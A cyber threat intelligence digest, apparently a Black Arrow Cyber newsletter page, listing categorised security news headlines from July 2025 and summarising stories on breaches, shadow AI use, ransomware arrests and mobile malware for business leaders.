Phishing & Email Based Attacks
Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media
13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek
Hackers Can Hide Malicious Code in Gemini's Email Summaries
Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority
Preventing Zero-Click AI Threats: Insights from EchoLeak | Trend Micro (US)
Other Social Engineering
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
Fraud, Scams and Financial Crime
Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Artificial Intelligence
AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks - Infosecurity Magazine
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
AI adoption is booming but secure scaling not so much - Help Net Security
Grok-4 Falls to a Jailbreak Two days After Its Release - SecurityWeek
Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding
90% of Large Organisations Unprepared for AI-Enabled Threats | Security Magazine
Cyber Security Bosses Fretting About AI Attacks and Misuse
Researcher tricks ChatGPT into revealing security keys - by saying "I give up" | TechRadar
For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET
GPUHammer: New RowHammer Attack Variant Degrades AI Models on NVIDIA GPUs
Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority
From Vibe Coding To Vibe Hacking — AI In A Hoodie
Curl creator mulls nixing bug bounty awards to stop AI slop • The Register
Malware
Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media
Hackers hide dangerous Mac trojan in legit apps | Cybernews
WordPress Gravity Forms developer hacked to push backdoored plugins
Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences
Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica
Google sues 25 alleged BadBox 2.0 botnet operators • The Register
AsyncRAT Spawns a Labyrinth of Forks
North Korean XORIndex malware hidden in 67 malicious npm packages
Threat hunting case study: Lumma infostealer | Intel 471
Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security
Bots/Botnets
Google sues 25 alleged BadBox 2.0 botnet operators • The Register
Mobile
Spyware on Androids Soars - Security Boulevard
Hackers Love These 7 Screenshots You Keep in Your Gallery
Android Malware Konfety evolves with ZIP manipulation and dynamic loading
Don’t Tap That Notification—This Is How Malware Sneaks Onto Smartphones
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek
Altered Telegram App Steals Chinese Users' Android Data
Denial of Service/DoS/DDoS
DDoS peaks hit new highs: Cloudflare mitigated massive 7.3 Tbps assault
Averted DDoS attacks spike, report finds | SC Media
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Internet of Things – IoT
Your Mercedes or VW could get hacked via Bluetooth | PCWorld
350M Cars, 1B Devices Exposed to 1-Click Bluetooth RCE
Uncovering the Cyber Security Risk in Smart Meter Data Storage | SC Media UK
Neglecting printer security is leaving you wide open to cyber attacks | IT Pro
Printer Security Gaps: A Broad, Leafy Avenue to Compromise
Data Breaches/Leaks
'123456' password exposed chats for 64 million McDonald’s job applicants
US Data Breaches Head for Another Record Year After 11% Surge - Infosecurity Magazine
How top military chief’s role in Afghan data leak was hidden
The Afghan data breach has already cost millions. What happens next?
Louis Vuitton says UK customer data stolen in cyber-attack | Cybercrime | The Guardian
Paddy Power and BetFair have suffered a data breach • Graham Cluley
Waltz brushes off SignalGate questions, points finger at CISA | CyberScoop
Data Breach at Debt Settlement Firm Impacts 160,000 People - SecurityWeek
Why hackers love Europe’s hospitals – POLITICO
Over 5.4 Million Affected in Healthcare Data Breach at Episource - Infosecurity Magazine
Anne Arundel Dermatology Data Breach Impacts 1.9 Million People - SecurityWeek
Organised Crime & Criminal Actors
"Telegram has become the new dark web” - 14.07.2025 | BURSA.RO
Abacus dark web drug market goes offline in suspected exit scam
How Criminal Networks Exploit Insider Vulnerabilities
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Cyber crime Victim Suicide: Bengaluru Man Dies After Rs 11 Lakh Digital Scam
Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch
Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
Millions in savers’ cash goes missing after crypto company collapses
Hacker steals $27 million in BigONE exchange crypto breach
MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine
Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner
Insider Risk and Insider Threats
Most cyber security risk comes from just 10% of employees - Help Net Security
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
How Criminal Networks Exploit Insider Vulnerabilities
US Army soldier pleads guilty to extorting 10 tech, telecom firms
Ex-soldier Googled “can hacking be treason?” pleads guilty • The Register
Insurance
Cyber Insurance Premiums Drop, but Coverage Is Key
Supply Chain and Third Parties
Supplier risk is breaking the size myth in cyber | Insurance Business America
Cloud/SaaS
Hackers Leverage Microsoft Teams to Spread Matanbuchus 3.0 Malware to Targeted Firms
Why your Microsoft 365 setup might be more vulnerable than you think - Help Net Security
SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine
Iran seeks three cloud providers to power its government • The Register
Outages
Cloudflare says 1.1.1.1 outage not caused by attack or BGP hijack
Encryption
How to Start Preparing for a Post-Quantum Future
How CISOs Can Prepare for the Quantum Cyber Security Threat
Safeguarding data in quantum era | Professional Security Magazine
What EU's PQC roadmap means on the ground - Help Net Security
Passwords, Credential Stuffing & Brute Force Attacks
'123456' password exposed chats for 64 million McDonald’s job applicants
From ‘P@ssw0rd’ to payday: Weak credentials threaten financial systems - Digital Journal
Ranked: The World's Most Common Passwords
98% of passwords can be cracked in seconds, analysis finds | Cybernews
Social Media
Quelle surprise! Twitter faces criminal probe in France • Graham Cluley
Training, Education and Awareness
Most cyber security risk comes from just 10% of employees - Help Net Security
Regulations, Fines and Legislation
Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine
Cyber security of banks - News - Rádio RSI English - STVR
How financial IT becomes resilient: Implement DORA securely: By Krik Gunning
What EU's PQC roadmap means on the ground - Help Net Security
UK Online Safety Act 'not up to scratch' on misinformation • The Register
US aims to ban China technology in undersea telecoms cables | The Straits Times
Top US cyber agency CISA shrinks under Trump budget, staff cuts
Defense Department to Spend $1B on ‘Offensive Cyber Operations’
Operational risks amid cyber policy uncertainty
Models, Frameworks and Standards
Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine
How financial IT becomes resilient: Implement DORA securely: By Krik Gunning
MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine
Data Protection
Buy Now, Pay Later... with your data - Help Net Security
Careers, Working in Cyber and Information Security
Military Veterans May Be What Cyber Security Is Looking For
Why burnout is one of the biggest threats to your security | TechRadar
What Fortune 100s are getting wrong about cyber security hiring - Help Net Security
Cyber Training: Post Challenge, Where Are the Skills Learned? | SC Media UK
Law Enforcement Action and Take Downs
US Army soldier pleads guilty to extorting 10 tech, telecom firms
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek
French and UK Authorities Arrest Suspects in Ransomware Cases
Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies
Quelle surprise! Twitter faces criminal probe in France • Graham Cluley
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek
Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine
Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion
FBI seized multiple piracy sites distributing pirated video games
Misinformation, Disinformation and Propaganda
UK Online Safety Act 'not up to scratch' on misinformation • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Russia shifts cyber war focus from US to UK following Trump's election | TechRadar
US aims to ban China technology in undersea telecoms cables | The Straits Times
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine
Cyber attacks are evolving – so too must government response - New Statesman
What Is A Military Cyber Command And What Does It Do?
Defense Department to Spend $1B on ‘Offensive Cyber Operations’
Nation State Actors
Cyber attacks are evolving – so too must government response - New Statesman
Nearly one-third of Irish firms paid a cyber ransom in last year
China
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
China’s cyber sector amplifies Beijing’s hacking of US targets - The Washington Post
What It Takes to Stop the Next Salt Typhoon
US aims to ban China technology in undersea telecoms cables | The Straits Times
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
Chinese Hackers Still Trying to Break Into Telecoms Across Globe
Altered Telegram App Steals Chinese Users' Android Data
US National Guard unit was 'extensively' hacked by Salt Typhoon in 2024, memo says | Reuters
Spain awarded €12.3 million in contracts to Huawei
Russia
Russia shifts cyber war focus from US to UK following Trump's election | TechRadar
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Nato unit helping combat Putin's 'hybrid warfare' threat on British soil
Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies
Ukrainian hackers claim IT attack on Russian drone maker • The Register
Iran
MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine
Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals
Iran seeks three cloud providers to power its government • The Register
North Korea
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch
North Korean XORIndex malware hidden in 67 malicious npm packages
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine
Tools and Controls
Most cyber security risk comes from just 10% of employees - Help Net Security
AI adoption is booming but secure scaling not so much - Help Net Security
DNS should be your next security priority: Lessons from NIST
SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine
Cyber-Insurance Premiums Drop, but Coverage Is Key
Neglecting printer security is leaving you wide open to cyber attacks | IT Pro
Printer Security Gaps: A Broad, Leafy Avenue to Compromise
Hackers hide dangerous Mac trojan in legit apps | Cybernews
Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences
Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica
Police disrupt “Diskstation” ransomware gang attacking NAS devices
Compliance is evolving — Is your resilience ready? | TechRadar
ISC2 Finds Orgs Are Increasingly Leaning on AI
Making security and development co-owners of DevSecOps - Help Net Security
Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding
For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET
Curl creator mulls nixing bug bounty awards to stop AI slop • The Register
Cyber security executives love AI, cyber security analysts distrust it | TechRadar
Things to think about when deploying AI tools in the cyber security space
UK launches vulnerability research program for external experts
NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine
Other News
Hackers swap biometric data to bypass Windows login | Cybernews
Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine
Securing vehicles as they become platforms for code and data - Help Net Security
NCA says 'crude' comparison to FBI efficiency 'not credible' • The Register
Cyber Security Isn’t Just For Experts Anymore: Why You Should Care
Banks urged to beef up cyber security amid more incidents of financial phishing | ABS-CBN News
70% of healthcare cyber attacks result in delayed patient care, report finds – DataBreaches.Net
Understanding replay attacks: A hidden threat in cyber security
Why hackers love Europe’s hospitals – POLITICO
Train Brakes Can Be Hacked Over Radio—And the Industry Knew for 20 Years - SecurityWeek
Vulnerability Management
Brits clinging to Windows 10 face heightened risk, says NCSC | Computer Weekly
NCSC Urges Enterprises to Upgrade to Microsoft Windows 11 to Avoid Cyb - Infosecurity Magazine
Microsoft extends updates for old Exchange and Skype servers • The Register
Don't Want to Upgrade to Windows 11? Microsoft Offers Free Windows 10 Security Updates - CNET
Another WannaCry-size cyber event likely, report warns :: Insurance Day
NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine
Vulnerabilities
Exploits for pre-auth Fortinet FortiWeb RCE flaw released, patch now
CitrixBleed 2 Flaw Poses Unacceptable Risk: CISA - SecurityWeek
Urgent: Google Releases Critical Chrome Update for CVE-2025-6558 Exploit Active in the Wild
Windows KB5064489 emergency update fixes Azure VM launch issues
Fully Patched SonicWall Gear Under Likely Zero-Day Attack
Critical SharePoint RCE Vulnerability Exploited Using Malicious XML Payload Within Web Part
Chrome fixes 6 security vulnerabilities. Get the update now! | Malwarebytes
Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812) - Help Net Security
Oracle Patches 200 Vulnerabilities With July 2025 CPU - SecurityWeek
Cisco Warns of Critical ISE Flaw Allowing Unauthenticated Attackers to Execute Root Code
VMware Flaws That Earned Hackers $340,000 at Pwn2Own Patched - SecurityWeek
Cisco Discloses '10' Flaw in ISE, ISE-PIC — Patch Now
July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek
Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner
Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security
Over 600 Laravel Apps Exposed to Remote Code Execution Due to Leaked APP_KEYs on GitHub
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 11 July 2025
Black Arrow Cyber Threat Intelligence Briefing 11 July 2025:
-‘The Worst Thing an Employee Could Do’: Workers Are Covering Up Cyber Attacks for Fear of Reprisal – Here’s Why That’s a Huge Problem
-Employees Are Quietly Bringing AI to Work and Leaving Security Behind
-Qantas Attack Reveals One Phone Call Can Crack Cyber Security’s Weakest Link: Humans
-Financial Firms Are Locking the Front Door but Leaving the Back Open
-Teens Arrested by NCA over Cyber Attacks on M&S, Harrods and Co-Op
-Should UK Companies Be Required to Disclose Major Cyber Attacks? M&S CEO Archie Norman Thinks So
-The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy
-Experts Warn This Top GenAI Tool Is Being Used to Build Phishing Websites
-The Rising Threat of Mobile Malware: How to Protect Your Device in 2025
-Nearly 8,500 Small and Medium Businesses Faced Cyber Attacks Through Fake Downloads and Mimic AI Tools in 2025
-Why Data Sovereignty Is Not Just a Legal Concern but a Cyber Security Imperative
-Whole of Society Must Respond to Threats Bringing ‘War to the Doorstep’, MPs Say
-Businesses at Greater Risk of Cyber Attack Due to Geopolitical Tensions
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
We start this week’s review by looking at the employees in your organisation. A report reveals that two out of five UK office workers would not alert their employer to a suspected cyber attack, mainly in fear of being blamed, while a separate report shows that 90% of employees are entering data into unauthorised AI tools without approval. The consequences of insufficient security through employees and third parties are highlighted by the attack on a supplier of Quantas that resulted in the loss of personal data of up to 6 million customers, and observations of poor security in the majority of third party suppliers in the financial sector.
In a further update on the attacks on UK retailers including M&S, four suspects of up to 20 years of age have been arrested, while the Chairman of M&S has called for all organisations to be obliged to disclose when they have been attacked. We also report on the real need for organisations to be prepared for how they will respond to cyber security incidents.
We report on the risks of Generative AI, mobile malware, malicious applications imitating trusted names such as Zoom, and attacks on individuals. We also report on how geopolitical tensions are increasing the risks of cyber attacks on organisations, highlighting the need for an objective leadership-driven risk assessment and cyber security strategy.
We know that while many organisations look to their IT team or service provider to manage their cyber security, the attacker instead looks to the employee as one of the easiest ways to break into the systems. Cyber security can only work if it is embraced by an upskilled leadership team that takes command of its risk management and maintenance of controls across people, operations and technology including the organisation’s culture.
Top Cyber Stories of the Last Week
‘The Worst Thing an Employee Could Do’: Workers Are Covering Up Cyber Attacks for Fear of Reprisal – Here’s Why That’s a Huge Problem
A recent study has revealed that 39% of UK office workers would not report a suspected cyber attack to their employer, largely due to fear of blame or disciplinary action. This silence persists despite relatively high awareness, with 79% of employees confident they could recognise a threat and 43% able to define ransomware. The findings suggest a culture problem, where fear of repercussions discourages openness and transparency. Past incidents show some staff have been punished or even dismissed after cyber attacks, reinforcing this reluctance. Building a blame-free reporting culture and improving cyber security training are critical steps forward.
Employees Are Quietly Bringing AI to Work and Leaving Security Behind
Despite growing efforts by IT departments to implement controls around artificial intelligence (AI), employees are increasingly using unapproved AI tools without oversight. Nearly three quarters of IT leaders have detected such unauthorised use, with over 90% of employees admitting to entering data into these tools without approval. This “shadow AI” poses a significant risk to organisations, particularly around data leakage and loss of visibility. Yet many staff see the benefits as outweighing the risks. The challenge for leadership is to close the gap between employee behaviour and governance, through clear policies, practical training, and integrating approved AI into daily workflows.
https://www.helpnetsecurity.com/2025/07/11/organizations-shadow-ai-risk/
Qantas Attack Reveals One Phone Call Can Crack Cyber Security’s Weakest Link: Humans
The Qantas data breach has highlighted how human error remains a critical weakness in cyber security. Attackers gained access to personal data for up to 6 million customers by exploiting an offshore IT support provider using social engineering, a method where criminals deceive staff into granting access. This incident follows a series of high-profile breaches across Australia’s healthcare, financial and telecommunications sectors. Experts warn that the growing use of third-party systems and tools like voice-cloning artificial intelligence are increasing the risks. Regulators are urging organisations to improve operational resilience, particularly by strengthening multi-factor authentication and scrutinising third-party cyber security controls.
Financial Firms Are Locking the Front Door but Leaving the Back Open
Financial institutions are improving their own cyber security defences, but many remain vulnerable through third-party suppliers. A recent study found that 92% of vendors serving the financial sector scored poorly in managing sensitive data, and 65% were not keeping systems updated against known risks. While direct cyber attacks on banks and insurers have declined, attackers are increasingly targeting vendors as a way in. These findings highlight that strong internal protections are not enough. Senior leaders should ensure third-party risk is actively monitored, assessed regularly, and addressed through procurement, contracts, and ongoing oversight.
https://www.helpnetsecurity.com/2025/07/11/financial-firms-third-party-cyber-risk/
Teens Arrested by NCA over Cyber Attacks on M&S, Harrods and Co-Op
The UK’s National Crime Agency has arrested four individuals, aged between 17 and 20, in connection with cyber attacks on major UK retailers including M&S, Harrods and Co-op. The suspects were detained on suspicion of offences such as computer misuse, blackmail and money laundering. Electronic evidence was seized and the investigation remains ongoing. The NCA has stressed the importance of businesses working closely with law enforcement when incidents occur, highlighting that early engagement can support more effective responses to serious cyber threats.
https://techinformed.com/teens-arrested-over-cyber-attacks-on-ms/
Should UK Companies Be Required to Disclose Major Cyber Attacks? M&S CEO Archie Norman Thinks So
Marks & Spencer’s Chairman has called for mandatory reporting of serious cyber attacks to the UK’s National Cyber Security Centre, highlighting that major incidents often go unreported. Following a recent attack on the retailer by a group posing as contractors, key systems including contactless payments and click-and-collect were disrupted. While stores stayed open, online clothing orders were only resumed after 46 days. The CEO estimated the cost of the incident at £300 million. The NCSC described the attack as a wake-up call, warning that other organisations remain at risk unless reporting and response practices improve.
https://cybernews.com/security/should-uk-companies-be-required-to-disclose-major-cyberattacks/
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy
Many businesses remain vulnerable to disruption due to a lack of formal continuity planning. With growing risks from cyber attacks, supply chain issues, and global instability, resilience is now a strategic necessity, not a back-office function. Despite rapid digital transformation, many organisations have yet to embed risk management into everyday operations, leaving them exposed to operational delays and reputational damage. Continuity today is about endurance, not just recovery. Firms that integrate scenario planning, agile governance, and proactive risk oversight are better placed to absorb shocks, maintain customer trust, and adapt quickly in a volatile market.
Experts Warn This Top GenAI Tool Is Being Used to Build Phishing Websites
Okta has identified that cyber criminals are using generative AI tools like v0.dev to rapidly create convincing phishing websites that mimic legitimate login pages. These sites are often hosted on trusted infrastructure, increasing the risk of users being deceived. The accessibility of AI tools has significantly lowered the skill required to launch such attacks, and open-source guides are further enabling this trend. Okta advises that traditional training alone is no longer sufficient, and organisations should adopt stronger controls such as multi-factor authentication and domain-based protections to defend against these evolving threats.
The Rising Threat of Mobile Malware: How to Protect Your Device in 2025
The rapid growth in smartphone use, expected to reach 7.2 billion users by 2025, has created an expanding target for cyber criminals. Mobile malware is rising sharply, with over 12 million attacks blocked in the first half of 2025 alone. The most common threats include trojans, spyware, adware, and ransomware, often disguised as legitimate apps or delivered via phishing messages. Official app stores are not immune, with some malicious apps reaching over 60 million downloads. Senior leaders should ensure mobile security policies are enforced across their organisations, including app vetting, operating system updates, and user awareness to reduce risk exposure.
https://cybernews.com/security/the-rising-threat-of-mobile-malware/
Nearly 8,500 Small and Medium Businesses Faced Cyber Attacks Through Fake Downloads and Mimic AI Tools in 2025
Kaspersky has reported that nearly 8,500 small and medium-sized businesses have faced cyber attacks in 2025 through fake downloads of widely used tools like Zoom, Microsoft Office, and newer AI platforms such as ChatGPT and DeepSeek. Attackers are increasingly disguising malicious software as popular apps, exploiting the rise in remote work and interest in artificial intelligence. Notably, files mimicking Zoom alone accounted for 41 percent of all cases observed. These threats often aim to steal login credentials or deliver malware through phishing emails and fake websites. Kaspersky advises SMBs to adopt robust cyber security practices, including verified software downloads, clear usage policies, and regular data backups.
https://www.dawn.com/news/1921871
Whole of Society Must Respond to Threats Bringing ‘War to the Doorstep’, MPs Say
UK MPs have warned that hostile states are increasingly using “grey zone” tactics such as cyber attacks, disinformation, sabotage and espionage to destabilise the UK without triggering formal conflict. A parliamentary report calls for a “whole of society” response, involving schools, businesses and communities alongside government. The Defence Committee stressed that these threats affect everyday life and target national infrastructure and digital systems. To address this, MPs are urging greater investment in cyber skills, public awareness, and infrastructure protection, as well as a new homeland security minister to coordinate efforts across sectors and strengthen national resilience.
https://uk.news.yahoo.com/whole-society-must-respond-threats-230100347.html
Businesses at Greater Risk of Cyber Attack Due to Geopolitical Tensions
Geopolitical tensions are driving a marked increase in cyber attacks from state-backed groups, terrorists, and politically motivated actors. A recent GlobalData report warns that organisations, particularly those involved in critical national infrastructure, are facing heightened risks from espionage and disruption campaigns. Nearly 60% of businesses now shape their cyber security response around geopolitical developments. Complex global supply chains further compound this risk, with suppliers often lacking robust cyber defences. Supply chain attacks are becoming more frequent and harder to contain, taking over 300 days on average to identify and resolve, significantly longer than other types of data breaches.
https://www.verdict.co.uk/businesses-at-greater-risk-of-cyberattack-due-to-geopolitical-tensions/
Governance, Risk and Compliance
Many workers wouldn't tell their bosses if they'd been hit by a cyber attack | TechRadar
Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur
Comms Business - MSPs relied on more than ever for cyber security, finds report
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro
Technology outpaces security adaptation, says Bitdefender
Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar
Many companies are still failing to budget for cyber security | TechRadar
Cyber insurance confronts the age of intelligent threats | Insurance Business America
SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Attacks Spike Despite Gang Closure - IT Security Guru
‘No honour among thieves’: M&S hacking group starts turf war
Should UK companies be required to disclose major cyber attacks? | Cybernews
Ransomware Groups Multiply as Attack Surface Rapidly Expands, GuidePoint Security Finds
Hunters International Ransomware Is Not Shutting Down, It’s Rebranding - Infosecurity Magazine
Iranian ransomware crew promises big bucks for US attacks • The Register
Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine
AiLock ransomware: What you need to know | Fortra
Unmasking the SafePay Ransomware Group - Infosecurity Magazine
SafePay Ransomware Surge Tend to Target Key Sectors
Short-lived ransomware group SatanLock to close down and leak data - BetaNews
New Bert Ransomware Group Strikes Globally with Multiple Variants - Infosecurity Magazine
Ransomware Victims
M&S shares sink lower after failing to recover from cyber attack
Cyber attack on M&S involved 'sophisticated impersonation', chairman says | Money News | Sky News
Should UK companies be required to disclose major cyber attacks? | Cybernews
Qantas data breach shows compliance doesn’t always mean protection and resilience | The Strategist
M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian
UK companies should have to disclose major cyber attacks, M&S says | Reuters
Four arrested in connection with M&S and Co-op cyber attacks - BBC News
Venture capital giant IdeaLab confirms breach, says private data was stolen in attack | TechRadar
Suspected Scattered Spider domains target multiple sectors • The Register
Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine
How M&S responds to its cyber-attack could have a serious impact on its future – and its customers
M&S chair refuses to discuss paying off cyber attackers | The Grocer
Hacker leaks Telefónica data allegedly stolen in a new breach
Qantas is being extorted in recent data-theft cyber attack
Ingram Micro Suffers Huge Ransomware Attack
IT Giant Ingram Micro Reveals Ransomware Breach - Infosecurity Magazine
Louis Vuitton says customer data was leaked following cyber attack | TechRadar
How cyber insurers are stepping up after M&S attack - Insurance Post
Qantas confirms data breach impacts 5.7 million customers
Ingram Micro Up and Running After Ransomware Attack
Customer, Employee Data Exposed in Nippon Steel Breach
Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News
Phishing & Email Based Attacks
Experts warn this top GenAI tool is being used to build phishing websites | TechRadar
New Phishing Attack Impersonates as DWP Attacking Users to Steal Credit Card Data
Cyber crooks jump on .es domain for credential phishing trip • The Register
Phishing Scams Can Deceive Large Language Models | Security Magazine
Identity attacks surge 156% as phishermen get craftier • The Register
Experts flag a huge amount of cyber attacks coming from this unexpected domain | TechRadar
A Clever Russian Phishing Attack Using Fake State Department Employees
Human rights body hooked by phishing scam - Newsroom
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian
M&S turned to FBI for help after ‘traumatic’ cyber attack
Browser Exploits Wane as Users Become the Attack Surface
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S
Fraud, Scams and Financial Crime
Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe
Hundreds of Malicious Domains Registered Ahead of Prime Day - Infosecurity Magazine
BaitTrap: Over 17,000 Fake News Websites Caught Fueling Investment Fraud Globally
SIM Swap Fraud Is Surging — and That's a Good Thing
eSIM Hack Allows for Cloning, Spying - SecurityWeek
How to protect your cell phone number from SIM swap attacks | TechCrunch
New Phishing Attack Impersonates as DWP Attacking Users to Steal Credit Card Data
Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan
Visa's 24/7 war room takes on global cyber criminals
Human rights body hooked by phishing scam - Newsroom
PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET
Artificial Intelligence
Experts warn this top GenAI tool is being used to build phishing websites | TechRadar
Employees are quietly bringing AI to work and leaving security behind - Help Net Security
Phishing Scams Can Deceive Large Language Models | Security Magazine
The Wild West of Agentic AI - An Attack Surface CISOs Can’t Afford to Ignore - SecurityWeek
Security practices must evolve to battle growing deepfake sophistication - SiliconANGLE
AI Security Institute targets cyber crime in hiring push - UKTN
The four-phase security approach to keep in mind for your AI transformation | TechRadar
It’s time to give AI security its own playbook and the people to run it - Help Net Security
Leveraging cyber security to establish trade secret protection in the age of AI - IAM
What Can Businesses Do About Ethical Dilemmas Posed by AI? - SecurityWeek
What Security Leaders Need to Know About AI Governance for SaaS
What CISOs Need to Know About AI Governance Frameworks | TechTarget
AI Accelerates Security Risks in Broken Data Environments
AI built it, but can you trust it? - Help Net Security
SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools
Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
Google Cloud keeps AI data in UK, but not the support • The Register
2FA/MFA
The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It
Malware
